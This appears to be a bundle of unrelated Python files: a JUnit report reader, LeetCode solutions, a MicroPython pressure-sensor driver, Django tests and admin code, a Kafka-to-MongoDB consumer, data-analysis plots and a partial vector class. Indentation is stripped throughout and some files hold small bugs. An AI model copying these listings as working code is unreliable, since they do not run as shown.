# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import glob
import traceback
from xml.etree.ElementTree import ElementTree
def print_detail_information(file_path, failure_cases):
print "-" * 50
for testcase in failure_cases:
print "classname: %s / testname: %s" % (testcase.get("classname"), testcase.get("name"))
print "-" * 50
print "Printing output..."
output_file_path = file_path.replace("TEST-", "").replace(".xml", "-output.txt")
if os.path.exists(output_file_path):
with open(output_file_path, "r") as fr:
print fr.read()
else:
print "No output file for the test case. desired output file path: %s" % output_file_path
print "-" * 50
def print_error_reports_from_report_file(file_path):
tree = ElementTree()
try:
tree.parse(file_path)
except:
print "-" * 50
print "Error parsing %s" % file_path
with open(file_path, "r") as fr:
print fr.read()
print "-" * 50
return
testcases = tree.findall(".//testcase")
failure_cases = []
for testcase in testcases:
error = testcase.find("error")
fail = testcase.find("fail")
failure = testcase.find("failure")
if error is not None or fail is not None or failure is not None:
failure_cases.append(testcase)
if len(failure_cases) > 0:
print_detail_information(file_path, failure_cases)
def main(report_dir_path):
for test_report in glob.iglob(report_dir_path + '/TEST-*.xml'):
file_path = os.path.abspath(test_report)
try:
print "Checking %s" % test_report
print_error_reports_from_report_file(file_path)
except Exception, e:
print "Error while reading report file, %s" % file_path
print "Exception: %s" % e
traceback.print_exc()
if __name__ == "__main__":
if sys.argv < 2:
print "Usage: %s [report dir path]" % sys.argv[0]
sys.exit(1)
main(sys.argv[1])
|
def repeatedStringMatch(A, B):
"""
:type A: str
:type B: str
:rtype: int
"""
count = 1
length = len(A)
copyA = A
while (len(copyA) < len(B)):
count += 1
copyA += A
if len(copyA) >= len(B) and B not in copyA:
count += 1
copyA += A
return count if B in copyA else -1
print(repeatedStringMatch("a", "aa"))
|
from umachine import SPI, Pin
from utime import sleep_ms
class MPL115A1:
"""Read pressure and temperature from MPL115A1 SPI sensor.
Adapted from https://github.com/FaBoPlatform/FaBoBarometer-MPL115-Python
Sources:
http://www.nxp.com/assets/documents/data/en/data-sheets/MPL115A1.pdf
https://learn.adafruit.com/micropython-hardware-spi-devices/spi-master.
As shown in section 3.6 of the datasheet, each 1-byte command is followed
by reading a 1-byte value (during which the master sends a dummy 0x00).
After a sequence of commands and reads, an extra 0x00 byte is sent.
The whole sequence is contained between CS enable and CS disable.
Constants have been defined for the sequence of commands and dummy
bytes to read coefficients (CMD_COEFS), start measurement (CMD_START)
and read pressure and temperature data (CMD_DATA).
"""
CMD_COEFS = bytearray(b'\x88\x00\x8A\x00\x8C\x00\x8E\x00\x90\x00\x92\x00\x94\x00\x96\x00\x00')
CMD_START = bytearray(b'\x24\x00')
CMD_DATA = bytearray(b'\x80\x00\x82\x00\x84\x00\x86\x00\x00')
def __init__(self, sclk='', miso='', mosi='', cs='P12',
baudrate=1000000, mode=0, altitude=0.0):
self.cs = Pin(cs, mode=Pin.OUT)
self._spi_enable(False)
self.spi = SPI(0, mode=SPI.MASTER, baudrate=2000000, polarity=0, phase=0) # this uses the SPI default pins for CLK, MOSI and MISO (``P10``, ``P11`` and ``P14``)
self._get_coefficients()
self.P = 0 # measured pressure at observer's altitude
self.P0 = 0 # calculated pressure at mean sea level
self.T = 0 # measured temperature
self.altitude = altitude
def _spi_enable(self, b=True):
self.cs.value(False) if b else self.cs.value(True)
def _spi_disable(self):
self._spi_enable(False)
def _convert_data(self, lsb, msb):
value = lsb | (msb << 8)
if (value & (1 << 16 - 1)):
value -= (1 << 16)
return value
def _get_coefficients(self):
data = bytearray(len(self.CMD_COEFS))
self._spi_enable(True)
self.spi.write_readinto(self.CMD_COEFS, data)
self._spi_enable(False)
self.a0 = self._convert_data(data[3], data[1])
self.b1 = self._convert_data(data[7], data[5])
self.b2 = self._convert_data(data[11], data[9])
self.c12 = self._convert_data(data[15], data[13])
self.a0 = float(self.a0) / (1 << 3)
self.b1 = float(self.b1) / (1 << 13)
self.b2 = float(self.b2) / (1 << 14)
self.c12 = float(self.c12) / (1 << 24)
def take_readings(self):
self._spi_enable(True)
self.spi.write(self.CMD_START)
self._spi_enable(False)
sleep_ms(3)
data = bytearray(len(self.CMD_DATA))
self._spi_enable(True)
self.spi.write_readinto(self.CMD_DATA, data)
self._spi_enable(False)
padc = ((data[1] << 8) | data[3]) >> 6
tadc = ((data[5] << 8) | data[7]) >> 6
pcomp = self.a0 + (self.b1 + self.c12 * tadc) * padc + self.b2 * tadc
self.P = pcomp * ((1150.0 - 500.0) / 1023.0) + 500.0
self.P0 = self.P / pow(1.0 - (self.altitude / 44330.0), 5.255)
self.T = 25.0 - (tadc - 512.0) / 5.35
if __name__ == '__main__':
MY_ALTITUDE = 9.0 # metres above mean sea level (AMSL)
barometer = MPL115A1(altitude=MY_ALTITUDE)
barometer.take_readings()
print("Temperature: {}C\nPressure: {}kPa\nP0: {}kPa".format(barometer.T,barometer.P,barometer.P0))
|
from django.test import TestCase
from blog import models
from blog import forms
# Create your tests here.
class BlogModelTest(TestCase):
def test_valid(self):
"""正常な入力を行えばエラーにならないことを検証"""
params = dict(content="test", photo="", anime_id="", anime="", tag="tag,tag、tag", user=1)
blog = models.Blog()
form = forms.BlogForm(params, instance=blog)
self.assertTrue(form.is_valid())
def test_either1(self):
"""何も入力しなければエラーになることを検証"""
params = dict()
blog = models.Blog()
form = forms.BlogForm(params, instance=blog)
self.assertFalse(form.is_valid())
class CommentModelTest(TestCase):
def test_valid(self):
"""正常な入力を行えばエラーにならないことを検証"""
params = dict(comment="test", post=1)
comment = models.Comment()
form = forms.CommentForm(params, instance=comment)
self.assertTrue(form.is_valid())
def test_either1(self):
"""何も入力しなければエラーになることを検証"""
params = dict()
blog = models.Comment()
form = forms.CommentForm(params, instance=blog)
self.assertFalse(form.is_valid())
|
import random
import json
from celery import shared_task
from backend.celery import celery_app
from celery.utils.log import get_logger
@shared_task
def test_task():
data = random.randint(0, 100)
return {'data': data}
|
class Solution:
## Iterative Solution
def generate(self, numRows: int) -> List[List[int]]:
ans = []
for i in range(numRows):
if i == 0:
ans.append([1])
if i == 1:
ans.append([1,1])
if i > 1:
prev = ans[-1]
row = [1]
for j in range(1,len(prev)):
row.append(prev[j-1] + prev[j])
row.append(1)
ans.append(row)
return ans
|
##############################################################
# This main file contains an overview of functions that were
# run to do simulations in the thesis of Koen Emmer
# Uncomment functions to run them
# For questions, contact me via LinkedIn
# https://www.linkedin.com/in/koenemmer/
##############################################################
##############################################################
# Import Modules
##############################################################
# Import Python libraries
# Import for BrainFrame
# import matplotlib
from configoptions import *
from reportplots import *
from datasetproposedmethod import *
from datasetsformodeldesign import *
from monopolar_simulations import *
from bipolar_simulations import *
##############################################################
# Build datasets for
##############################################################
# runwave("ClassicModel", "square", "complete", "saveall")
# runwave("ClassicModel", "sine", "complete", "saveall")
# runsquarewaveCB("ClassicModel", "complete", "saveall")
# runwave("ProposedModel", "square", "complete", "saveall")
# runwave("ProposedModel", "sine", "complete", "saveall")
# runsquarewaveCB("ProposedModel", "complete", "saveall")
##############################################################
# Find blocking amplitudes via proposed method
##############################################################
# squarewaveresults()
# sineresults()
# assymmetricalresults()
##############################################################
# Plot single KHFAC simulation
##############################################################
# plot_square_classic(tstop=20)
# plot_sine_classic()
# plot_assymmetric_classic(f=10, a=0.2, tstop = 50.0, chargebalance=0.1, intrinsic=1)
# plot_square_proposed(f=10, a=0.47)
# plot_sine_proposed(f=10, a=0.52)
# plot_assymmetric_classic(f=10, a=0.55, tstop = 51.0, chargebalance=0.8, intrinsic=1)
# plot_assymmetric_classic(f=10, a=0.6, tstop = 51.0, chargebalance=0.9, intrinsic=1)
# plot_assymmetric_proposed(f=10, a=0.19, chargebalance=0.1)
# plot_assymmetric_proposed(f=10, a=0.2, chargebalance=0.1)
# plot_assymmetric_proposed(f=10, a=0.6, chargebalance=0.9)
# plot_sine_proposed(10,0.52)
# plot_sine_proposed(10,0.45)
# plot_sine_proposed(40,0.66)
# plot_sine_proposed(40,0.60)
# plot_square_proposed_bipolar(10,1.0)
##############################################################
# Plot and test waveforms (uncomment one of the lines together with the last two lines to produce a picture
##############################################################
# t_signal, i_signal = sinewave(0, 0.1, 10, 1, 1000)
# t_signal, i_signal = chargebalanced_asymmetrical(0, 2.0, 1, 0.06, 0.8, 0.1, 0.1)
# t_signal, i_signal = chargebalanced_asymmetrical(0, 0.1, 10, 0.05, 0.9)
# t_signal, i_signal = trianglewave(0, 0.1, 10, 1)
# t_signal, i_signal = squarewave_ip(0, 0.2, 10, 1, 0.1, 0.1)
# t_signal, i_signal = squarewave(0, 0.2, 10, 1)
# t_signal, i_signal = stepwave(0, 0.1, 10, 2, 3)
# t_signal, i_signal = stepwave_sine(0, 0.1, 10, 1, 20)
# plot_signal(plt, t_signal, i_signal)
# plt.show()
##############################################################
# Monopolar simulations -> create result files
##############################################################
# monopolar_triangularwave_results()
# monopolar_sinewave_results()
# monopolar_squarewave_results()
# monopolar_step("triangular")
# monopolar_step("sine")
# monopolar_assymmetricalwave_results()
# squarewave_ipd_results()
# monopolar_squarewave_realdistance_results()
# squarewave_ipd_results("validation")
##############################################################
# Bipolar simulations -> create result files
##############################################################
# bipolar_squarewave_ETAdistance_IECdistance_parallel_results()
# bipolar_squarewave_ETAdistance_IECdistance_parallel_results(zoom=True)
# bipolar_squarewave_IECdistance_results('parallel')
# bipolar_squarewave_IECdistance_results('perpendicular')
# bipolar_squarewave_orientation_results('x')
# bipolar_squarewave_orientation_results('z')
##############################################################
# Build report plots
##############################################################
## Background chapter
# plotAP()
# plotKHFACdemogates()
# plothminftau()
## Method chapter
# plot_2D_blockdescription()
# plot_3D_blockdescription()
# plot_gates_proposedmethodsetup()
# plot_asymmetrical_waveform()
# justificationplots("sine")
# justificationplots("square")
# justificationplots("squareCB")
## Results Chapter
# Monopolar plots
# plot_monopolar("monopolar_basic_waveforms", "amplitude")
# plot_monopolar("monopolar_basic_waveforms", "cpp")
# plot_monopolar("stepfunctions", "amplitude")
# plot_monopolar("stepfunctions", "cpp")
# plot_monopolar("asymmetrical", "amplitude", "colour")
# plot_monopolar("asymmetrical", "cpp", "colour")
# plot_monopolar("asymmetrical", "amplitude", "3D")
# plot_monopolar("asymmetrical", "cpp", "3D")
# plot_monopolar("asymmetrical", "amplitude", "singlefrequency", 10)
# plot_monopolar("squarewave_ipd", "amplitude", "lines")
# plot_monopolar("squarewave_ipd", "cpp", "lines")
# plot_monopolar("squarewave_ipd", "amplitude", "colour")
# plot_monopolar("squarewave_ipd", "cpp", "colour")
# plot_monopolar("squarewave_ipd", "amplitude", "3D")
# plot_monopolar("squarewave_ipd", "cpp", "3D")
# plot_monopolar("squarewave_ipd_validation", "amplitude", "lines")
# plot_monopolar("squarewave_ipd_validation", "cpp", "lines")
# plot_monopolar("squarewave_ipd_validation", "amplitude", "colour")
# plot_monopolar("squarewave_ipd_validation", "cpp", "colour")
# plot_monopolar("realdistance", "amplitude")
# plot_monopolar("realdistance", "cpp")
# Bipolar plots
# plot_bipolar("ETA_IEC_parallel", "amplitude", "lines")
# plot_bipolar("ETA_IEC_parallel", "cpp", "lines")
# plot_bipolar("ETA_IEC_parallel", "amplitude", "colour")
# plot_bipolar("ETA_IEC_parallel", "cpp", "colour")
# plot_bipolar("ETA_IEC_parallel", "amplitude", "3D")
# plot_bipolar("ETA_IEC_parallel", "cpp", "3D")
# plot_bipolar("ETA_IEC_parallel", "amplitude", "optimal")
# plot_bipolar("ETA_IEC_parallel", "amplitude", "lines", zoom=True)
# plot_bipolar("ETA_IEC_parallel", "cpp", "lines", zoom=True)
# plot_bipolar("ETA_IEC_parallel", "amplitude", "colour", zoom=True)
# plot_bipolar("ETA_IEC_parallel", "cpp", "colour", zoom=True)
# plot_bipolar("ETA_IEC_parallel", "amplitude", "3D", zoom=True)
# plot_bipolar("ETA_IEC_parallel", "cpp", "3D", zoom=True)
# plot_bipolar("ETA_IEC_parallel", "amplitude", "optimal", zoom=True)
# plot_bipolar("IEC_parallelperpendicular", "amplitude")
# plot_bipolar("IEC_parallelperpendicular", "cpp")
# plot_bipolar("orientation", "amplitude")
## Discussion plots
# plot_asymmetrical_bipolar(0.001)
# plot_ipdbasicimplementation(0.25,0.25)
# plot_ipdbasicimplementation(0,0.5)
# plot_ipdcompleximplementation()
# plot_ipd_validation(0.4,0,0)
##############################################################
## Build presentation plots
##############################################################
# buildKHFACgif()
quitNeuron() |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib import admin
from django.urls import reverse
from django.utils.html import format_html
from .models.Person import Person
from .models.Affiliation import Affiliation
from .models.Organization import Organization,OrgRelationship
from .models.Resource import Resource,Collaboration
from .models.Publication import Publication
from .models.Identity import Identity
from .models.Expression import Expression
from .models.BioProject import BioProject
from .models.Structure import Structure
from .models.Sample import Sample
from .models.ReadsArchive import ReadsArchive
from .models.Assembly import Assembly
from .models.Barcode import Barcode
from .models.ResourceRelation import ResourceRelation
from .models.RKeyword import RKeyword
from .models.ExternalId import ExternalId
from .models.ResourceProperty import ResourceProperty
from .models.Job import Job
from .models.Tool import Tool
admin.site.register(Identity)
admin.site.register(RKeyword)
admin.site.register(Affiliation)
admin.site.register(ResourceProperty)
admin.site.register(ExternalId)
@admin.register(Sample)
class SampleArchiveAdmin(admin.ModelAdmin):
autocomplete_fields = ["ncbi_tax"]
search_fields = ["name","description"]
list_display = ["name", "description", "deprecated", "updated_at"]
@admin.register(Tool)
class ToolArchiveAdmin(admin.ModelAdmin):
autocomplete_fields = ["ncbi_tax"]
search_fields = ["name","description"]
list_display = ["name", "description", "deprecated", "updated_at"]
@admin.register(ReadsArchive)
class ReadsArchiveAdmin(admin.ModelAdmin):
autocomplete_fields = ["ncbi_tax"]
search_fields = ["name","description"]
list_display = ["name", "description", "deprecated", "updated_at"]
@admin.register(Resource)
class ResourceAdmin(admin.ModelAdmin):
autocomplete_fields = ["ncbi_tax"]
search_fields = ["name","description"]
list_display = ["name", "description", "deprecated", "updated_at"]
# def link(self, obj):
# # https://en.proft.me/2014/10/12/reversing-admin-urls-django/
# return format_html('<a href="{url}?pdb_id={{pdb_id}}">Resources</a>',
# pdb_id=obj.id, url=reverse('admin:bioresources_resource_changelist'))
@admin.register(ResourceRelation)
class ResourceRelationAdmin(admin.ModelAdmin):
autocomplete_fields = ["source", "target"]
@admin.register(Expression)
class ExpressionAdmin(admin.ModelAdmin):
autocomplete_fields = ["ncbi_tax"]
search_fields = ["name","description"]
list_display = ["name", "description", "deprecated", "updated_at"]
@admin.register(BioProject)
class BioProjectAdmin(admin.ModelAdmin):
autocomplete_fields = ["ncbi_tax"]
search_fields = ["name","description"]
list_display = ["name", "description", "deprecated", "updated_at"]
@admin.register(Assembly)
class AssemblyAdmin(ResourceAdmin):
autocomplete_fields = ["ncbi_tax"]
search_fields = ["name","description"]
list_display = ["name", "description", "deprecated", "updated_at"]
@admin.register(Organization)
class OrganizationAdmin(admin.ModelAdmin):
search_fields = ["name","description","source__name"]
autocomplete_fields = ["source"]
list_display = ["name", "description","country","source", "deprecated", "updated_at"]
def get_queryset(self, request):
qs = super(OrganizationAdmin, self).get_queryset(request)
return qs.select_related("source")
# @admin.register(OrgRelationship)
# class OrgRelationshipAdmin(admin.ModelAdmin):
# search_fields = ["source__name","target__name","source__description","target__description"]
# autocomplete_fields = ["source","target"]
# list_display = ["source","target" ]
#
# def get_queryset(self, request):
#
# qs = super(OrgRelationshipAdmin, self).get_queryset(request)
#
# return qs.select_related("source","target")
@admin.register(Structure)
class StructureAdmin(admin.ModelAdmin):
autocomplete_fields = ["ncbi_tax"]
search_fields = ["name","description"]
list_display = ["name", "description", "deprecated", "updated_at"]
@admin.register(Barcode)
class BarcodeAdmin(admin.ModelAdmin):
autocomplete_fields = ["ncbi_tax"]
search_fields = ["name","description"]
list_display = ["name", "description", "deprecated", "updated_at"]
@admin.register(Publication)
class PublicationAdmin(admin.ModelAdmin):
autocomplete_fields = ["ncbi_tax"]
list_display = ["name", "description", "links"]
search_fields = ["name", "description"]
def links(self, obj):
# https://en.proft.me/2014/10/12/reversing-admin-urls-django/
return format_html('<a href="{url}?pdb_id={{pdb_id}}">Resources</a>',
pdb_id=obj.id, url=reverse('admin:bioresources_resource_changelist'))
@admin.register(Job)
class JobAdmin(admin.ModelAdmin):
autocomplete_fields = ["user"]
list_display = ["id", "user", "status"]
search_fields = ["name", "description"]
@admin.register(Person)
class PersonAdmin(admin.ModelAdmin):
search_fields = [ "surname", "name"]
list_display = [ "surname", "name"]
@admin.register(Collaboration)
class CollaborationAdmin(admin.ModelAdmin):
autocomplete_fields = [ "person", "resource"]
search_fields = [ "person", "resource"]
list_display = [ "person", "resource"] |
'''
@Author: Sankar
@Date: 2021-04-08 13:37:25
@Last Modified by: Sankar
@Last Modified time: 2021-04-08 13:38:09
@Title : Basic_Python-28
'''
'''
Write a Python program to clear the screen or terminal.
'''
import os, sys
os.system("cls") |
#!/usr/bin/python3
import argparse
import numpy as np
import matplotlib.pyplot as plt
from math import floor, ceil
from decimal import Decimal
def read_file(ifile: object, ofile: object, bin_size: float) -> object:
size = (2, 3)
coords = np.zeros(size, dtype=float)
d = []
with open(ifile) as f:
next(f)
next(f)
while True:
line = f.readline()
if not line:
break
else:
data = line.split()
coords[0, :] = data[1:]
line = f.readline()
data = line.split()
coords[1, :] = data[1:]
d.append(distance(coords))
try:
next(f)
next(f)
except StopIteration:
filename = ''.join(
ofile.replace(
'../',
'').split('.')[
:-1])
extension = ''.join(ofile.split('.')[-1])
with open(filename + '_raw.' + extension, 'w') as o:
for item in d:
o.write("%s\n" % item)
distances = np.array(d, dtype=float)
result, bin_edges = pofr(distances, bin_size)
with open(filename + '.' + extension, 'w') as o:
txt = "{bin_c:8.6f} \t {val:8.6f} \n"
o.write(
"# bin_center \t value \t bin_size = {} \n".format(
bin_size))
for value, edge in zip(result, bin_edges[:-1]):
o.write(
txt.format(
val=value,
bin_c=(edge + float(bin_size) / 2.0)))
return
def distance(c):
r = np.sqrt((c[0, 0]-c[1, 0])**2+(c[0, 1]-c[1, 1])**2+(c[0, 2]-c[1, 2])**2)
return(r)
def round_down(div, *args):
result = []
for i in args:
# Decimal reduces error chance from binary fractions
# round precision of 5 should be enough for all reasonable bins
# consider using something like:
# https://stackoverflow.com/questions/6189956/easy-way-of-finding-decimal-places
result.append(round(div * floor(float(Decimal(str(i)))/div), 5))
return result
def pofr(d, bin_size):
# find lowest datapoint
d_min = d.min()
# round_down to bin multiple
d_min = round_down(bin_size, d_min)[0]
# create bins
n_bins = int(ceil((d.max()-d_min)/bin_size))
# get d.max()
d_max = (d_min + n_bins * bin_size)
# create histogram
hist, bin_edges = np.histogram(d,
bins=n_bins,
range=(d_min, d_max),
density=True)
# arguments are passed to np.histogram
plt.hist(d, density=True, bins=n_bins, range=(d_min, d_max))
plt.title("N-N p(r)")
plt.xlabel("r")
plt.ylabel("p(r)")
plt.savefig(
"{0}.png".format(
args.output.replace(
"../",
"").replace(
".dat",
"")))
# fig.show()
return hist, bin_edges
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description='Generate the p(r) for an xyz file with only 2 atoms')
parser.add_argument(
'--input',
'-i',
help='Path to the input xyz file',
required=True)
parser.add_argument(
'--output',
'-o',
help='Path to the output p(r) file',
default='pr.dat')
parser.add_argument(
'--bin_size',
'-b',
help='Bin size. Default = 0.1',
default='0.1')
args = parser.parse_args()
read_file(args.input, args.output, float(args.bin_size))
|
"""
Module to read alerts from the Kafka topic ("alerts_topic") where Flink applications post alerts and then put them in MongoDB.
"""
from kafka import KafkaConsumer, TopicPartition
import json, pymongo, datetime
from pymongo import MongoClient
def insert_records(records):
for record in records:
# No need to display alerts for empty keys
if (record['key'] in ['{"hashtag":"__NO_HASHTAG_FOUND__"}', '"url":"__NO_URLS_FOUND__"', {'"user_mention":"__NO_MENTIONS_FOUND__"'}]):
continue
record['window_start'] = datetime.datetime.fromtimestamp(record['window_start']/1000)
record['window_end'] = datetime.datetime.fromtimestamp(record['window_end']/1000)
db.update({'alert_name':record['alert_name'], 'window_start':record['window_start'], 'window_end':record['window_end'],
'key':record['key']}, record, upsert=True)
if __name__ == "__main__":
db = MongoClient('mongodb://localhost:27017/')['alerts'].alerts
consumer = KafkaConsumer(group_id='flink_out_consumers', value_deserializer=json.loads)
partition = TopicPartition('alerts_topic',0)
consumer.assign([partition])
print(consumer.assignment())
# consumer.seek_to_beginning()
while(True):
try:
ret = consumer.poll(10000) # polls for 10 seconds
if ret != {}:
records = [record.value for record in ret[partition]]
print(records)
insert_records(records)
print('Ended poll')
except Exception as e:
print(e)
continue |
import pandas as pd
import numpy as np
import xgboost as xgb
from sklearn.model_selection import train_test_split
from sklearn.impute import SimpleImputer
from matplotlib import pyplot as plt
import seaborn as sns
import os
from pycomp.viz.insights import *
# Project variables
DATA_PATH = 'C:/Work/HP/dataset'
TRAIN_FILENAME = 'Fin_H2-6703.csv'
# TEST_FILENAME = 'test.csv'
# Reading training data
df = pd.read_csv(os.path.join(DATA_PATH, TRAIN_FILENAME))
df.head()
figsize = (10, 7)
fig, ax = plt.subplots(figsize=figsize)
format_spines(ax=ax, right_border=False)
# Jam rate
# df['Pass / Fail'] = df['Pass / Fail'].replace('none', '1')
df['Pass / Fail'] = df['Pass / Fail'].replace('none', '0')
jam_map = {'1': 'Jam', '0': 'NoJam'}
jam_colors = ['crimson', 'darkslateblue']
plot_donut_chart(df=df, col='Pass / Fail', label_names=jam_map, colors=jam_colors,
title='Absolute Total and Percentual of Pass/Fail Results')
"""
# Countplot for duplex
duplex_colors = ['lightskyblue', 'lightcoral']
duplex_map = {'0': 'Simplex', '1': 'Duplex'}
plot_countplot(df=df, col='Duplex', palette=duplex_colors, label_names=duplex_map,
title='Total Jam Case by Duplex')
# Jam rate by duplex
plot_countplot(df=df, col='Pass / Fail', hue='Duplex', label_names=jam_map, palette=duplex_colors,
title="Could duplex had some influence on Jam Error?")
# Plotting a double donut chart
plot_double_donut_chart(df=df, col1='Pass / Fail', col2='Duplex', label_names_col1=jam_map,
colors1=['crimson', 'navy'], colors2=['lightcoral', 'lightskyblue'],
title="Did the duplex influence on jam rate?")
"""
"""
# Countplot for Target Bin
# df['Target Bin'] = df['Target Bin'].replace('none', '2')
df['Target Bin'] = df['Target Bin'].replace('none', '1')
target_bin_colors = ['lightskyblue', 'lightcoral']
target_bin_map = {'2': 'Target Bin:2', '1': 'Target Bin:else'}
plot_countplot(df=df, col='Target Bin', palette=target_bin_colors, label_names=target_bin_map,
title='Total Jam Case by Target Bin')
# Jam rate by Target Bin
plot_countplot(df=df, col='Pass / Fail', hue='Target Bin', label_names=jam_map, palette=target_bin_colors,
title="Could Target Bin had some influence on Jam Error?")
"""
"""
# Countplot for Error Code
# df['Error Code'] = df['Error Code'].replace('none', '703')
df['Error Code'] = df['Error Code'].replace('none', '0')
error_code_colors = ['lightskyblue', 'lightcoral']
error_code_map = {'703': 'Error:703', '0': 'Else'}
plot_countplot(df=df, col='Error Code', palette=error_code_colors, label_names=error_code_map,
title='Total Jam Case by Error Code')
# Jam rate by Error Code
plot_countplot(df=df, col='Pass / Fail', hue='Error Code', label_names=jam_map, palette=error_code_colors,
title="Could Error Code had some influence on Jam Error?")
"""
"""
# Countplot for Eos >> ID
# df['Eos >> ID'] = df['Eos >> ID'].replace('none', '0')
# df['Eos >> ID'] = df['Eos >> ID'].replace('none', '1')
df['Eos >> ID'] = df['Eos >> ID'].replace('none', '2')
eos_id_colors = ['lightskyblue', 'lightcoral', 'navy']
eos_id_map = {'0': '0', '1': '1', '2': '2'}
plot_countplot(df=df, col='Eos >> ID', palette=eos_id_colors, label_names=eos_id_map,
title='Total Jam Case by Eos >> ID')
# Jam rate by Error Code
plot_countplot(df=df, col='Pass / Fail', hue='Eos >> ID', label_names=jam_map, palette=eos_id_colors,
title="Could Eos >> ID had some influence on Jam Error?")
"""
"""
# Countplot for EosFull
eosfull_colors = ['lightskyblue', 'lightcoral']
eosfull_map = {'10': '10', '20': '20'}
plot_countplot(df=df, col='Eos - Full', palette=eosfull_colors, label_names=eosfull_map,
title='Total Jam Case by Eos - Full')
# Jam rate by Eos - Full
plot_countplot(df=df, col='Pass / Fail', hue='Eos - Full', label_names=jam_map, palette=eosfull_colors,
title="Could duplex had some influence on Jam Error?")
# Plotting a double donut chart
plot_double_donut_chart(df=df, col1='Pass / Fail', col2='Eos - Full', label_names_col1=jam_map,
colors1=['crimson', 'navy'], colors2=['lightcoral', 'lightskyblue'],
title="Did the Eos - Full influence on jam rate?")
"""
"""
# Distribution of EosVal variable
plot_distplot(df=df, col='EosVal', title="EosVal Distribution")
# plot_distplot(df=df, col='EosVal', hue='Pass / Fail', kind='kde',
# title="Is there any relationship between EosVal distribution\n from jam and no jam case?")
ax.set_title("Is there any relationship between EosVal distribution\n from jam and no jam case?", size=16)
sns.kdeplot(df[df['Pass / Fail']=='0']['EosVal'], ax=ax, color='b', shade=True, Label='0')
sns.kdeplot(df[df['Pass / Fail']=='1']['EosVal'], ax=ax, color='r', shade=True, Label='1')
"""
"""
# Distribution of EXIT ID variable
feature_name = 'EXIT ID'
df[feature_name] = df[feature_name].replace('none', np.nan)
df[feature_name] = df[feature_name].fillna(df[feature_name].median())
print(f'Median value of {feature_name} : {df[feature_name].median()}')
plot_distplot(df=df, col=feature_name, title="EXIT ID Distribution")
ax.set_title("Is there any relationship between EXIT ID distribution\n from jam and no jam case?", size=16)
sns.kdeplot(df[df['Pass / Fail']=='0'][feature_name], ax=ax, color='b', shade=True, Label='0')
sns.kdeplot(df[df['Pass / Fail']=='1'][feature_name], ax=ax, color='r', shade=True, Label='1')
"""
"""
# Distribution of IDInfo_ID variable
feature_name = 'IDInfo_ID'
df[feature_name] = df[feature_name].replace('none', np.nan)
df[feature_name] = df[feature_name].fillna(df[feature_name].median())
print(f'Median value of {feature_name} : {df[feature_name].median()}')
plot_distplot(df=df, col=feature_name, title="IDInfo_ID Distribution")
ax.set_title("Is there any relationship between IDInfo_ID distribution\n from jam and no jam case?", size=16)
sns.kdeplot(df[df['Pass / Fail']=='0'][feature_name], ax=ax, color='b', shade=True, Label='0')
sns.kdeplot(df[df['Pass / Fail']=='1'][feature_name], ax=ax, color='r', shade=True, Label='1')
"""
"""
# Distribution of ID - Eos variable
feature_name = 'ID - Eos'
df[feature_name] = df[feature_name].replace('none', np.nan)
df[feature_name] = df[feature_name].fillna(df[feature_name].median())
print(f'Median value of {feature_name} : {df[feature_name].median()}')
plot_distplot(df=df, col=feature_name, title="ID - Eos Distribution")
ax.set_title("Is there any relationship between ID - Eos distribution\n from jam and no jam case?", size=16)
sns.kdeplot(df[df['Pass / Fail']=='0'][feature_name], ax=ax, color='b', shade=True, Label='0')
sns.kdeplot(df[df['Pass / Fail']=='1'][feature_name], ax=ax, color='r', shade=True, Label='1')
"""
"""
# Distribution of Exit - ID variable
feature_name = 'Exit - ID'
df[feature_name] = df[feature_name].replace('none', np.nan)
df[feature_name] = df[feature_name].fillna(df[feature_name].median())
print(f'Median value of {feature_name} : {df[feature_name].median()}')
plot_distplot(df=df, col=feature_name, title="Exit - ID Distribution")
ax.set_title("Is there any relationship between Exit - ID distribution\n from jam and no jam case?", size=16)
sns.kdeplot(df[df['Pass / Fail']=='0'][feature_name], ax=ax, color='b', shade=True, Label='0')
sns.kdeplot(df[df['Pass / Fail']=='1'][feature_name], ax=ax, color='r', shade=True, Label='1')
"""
# Distribution of Del - Exit variable
feature_name = 'Del - Exit'
df[feature_name] = df[feature_name].replace('none', np.nan)
df[feature_name] = df[feature_name].fillna(df[feature_name].median())
print(f'Median value of {feature_name} : {df[feature_name].median()}')
plot_distplot(df=df, col=feature_name, title="Del - Exit Distribution")
ax.set_title("Is there any relationship between Del - Exit distribution\n from jam and no jam case?", size=16)
sns.kdeplot(df[df['Pass / Fail']=='0'][feature_name], ax=ax, color='b', shade=True, Label='0')
sns.kdeplot(df[df['Pass / Fail']=='1'][feature_name], ax=ax, color='r', shade=True, Label='1')
# print(df[df['Pass / Fail']=='0'][feature_name].count())
# pd.set_option('display.max_rows', 500)
# print(df[df['Pass / Fail']=='0'][feature_name])
plt.show()
|
'''
super simple vector class and vector functionality. i wrote this simply because i couldn't find
anything that was easily accessible and quick to write. this may just go away if something more
comprehensive/mature is found
'''
import math
class MatrixException(Exception):
pass
class Vector(object):
#__slots__ = ('x','y','z','w')
def __init__( self, x=0, y=0, z=0, w=None ):
self.x = x
self.y = y
self.z = z
self.w = w
if isinstance(x,(list,tuple)):
self.x = x[0]
self.y = x[1]
self.z = x[2]
if len(x) == 4: self.w = x[3]
def __repr__( self ):
if self._is4Vec: return str(( self.x, self.y, self.z, self.w ))
return str(( self.x, self.y, self.z ))
def __str__( self ):
return str(repr(self))
def __add__( self, other ):
if self._is4Vec: return self.__class__( self.x+other.x, self.y+other.y, self.z+other.z, self.w+other.w )
else: return self.__class__( self.x+other.x, self.y+other.y, self.z+other.z )
def __sub__( self, other ):
return self + -other
def __mul__( self, factor ):
if isinstance(factor,Vector):
return self.dot(factor)
elif isinstance(factor,Matrix):
new = self.__class__()
size = self.size
for i in range(size):
element = 0
col = factor.getCol(i)
for j in range(size):
element += self[j]*col[j]
new[i] = element
return new
else:
if self._is4Vec: return self.__class__( self.x*factor, self.y*factor, self.z*factor, self.w*factor )
else: return self.__class__( self.x*factor, self.y*factor, self.z*factor )
def __div__( self, denominator ):
if self._is4Vec: return self.__class__( self.x/denominator, self.y/denominator, self.z/denominator, self.w/denominator )
return self.__class__( self.x/denominator, self.y/denominator, self.z/denominator )
def __invert__( self ):
return -self
def __neg__( self ):
return self*-1
